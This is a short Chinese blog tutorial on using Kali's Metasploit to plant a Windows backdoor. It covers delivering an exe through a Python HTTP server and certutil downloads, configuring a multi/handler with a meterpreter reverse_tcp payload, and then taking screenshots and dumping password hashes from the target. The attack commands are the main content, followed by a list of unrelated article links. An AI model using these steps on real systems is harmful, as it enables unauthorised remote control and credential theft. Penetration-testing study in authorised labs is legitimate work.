Kali之metasploit学习

**目标:**尝试使用metasploit制作一个windows 后门(exe文件)

一:使用metasploit生成一个exe安装包。

二、将对应的可执行文件放入到目标机

python3 -m http.server 端口号: 模块化启动一个端口。

**windows 证书管理工具:**certutil ,可以使用它来下载文件。

**例如:**certutil -urlcache -split -f http://目标ip地址:端口号

三、开启metasploit监听msfconsole

msf 的使用法则:

1.使用模块 use

2. 配置模块必选项:set

3.运行模块:run

具体实践步骤如下:

  1. 输入msfconsole进入msf6命令行

2.使用模块 并设置相关参数

bash 复制代码
# 使用 攻击/多重/句柄 
use exploit/multi/handler  

# 和之前生成exe文件的保持一致
# 设置payload
set payload windows/x64/meterpreter/reverse_tcp

# 设置ip 
set lhost 192.168.*.*

# 设置端口
set lport 9000

3.运行run

四、尝试获取目标机(windows)信息

截图命令:screenshot

密码:hashdump (当密码超过8位,且有多种元素,就无法破解了)

相关推荐
Linging_2412 分钟前
基于Langchain得AI Agent相关知识学习
人工智能·学习·langchain
minglie19 小时前
高等代数试题
学习
Xiaofeng369310 小时前
GPT-5.6 发布后,我用了一个周末重新规划学习路线图
gpt·学习
其实防守也摸鱼11 小时前
运维--怎么看接口的请求和返回
运维·学习·网络安全·网络攻击模型·burpsuite·攻防对抗·蓝队
酷讯网络_24087016011 小时前
区块粮仓宠物NFT源码区块狗/抢购转让预约区块投资理财系统
学习·开源·宠物
Generalzy12 小时前
从本地 Demo 到生产级检索:Milvus 学习笔记(3)
笔记·学习·milvus
心中有国也有家13 小时前
AtomGit Flutter 鸿蒙客户端:ModalBottomSheet 实战
android·javascript·学习·flutter·华为·harmonyos
tyqtyq2213 小时前
求职信生成:AI 智能求职信撰写系统的鸿蒙实现
人工智能·学习·华为·生活·harmonyos
MartinYeung513 小时前
[论文学习]PrivacyLens:评估语言模型在行动中的隐私规范意识
人工智能·学习·语言模型
凉、介14 小时前
Virtio 系列(一):框架概览
笔记·学习·嵌入式·虚拟化·virtio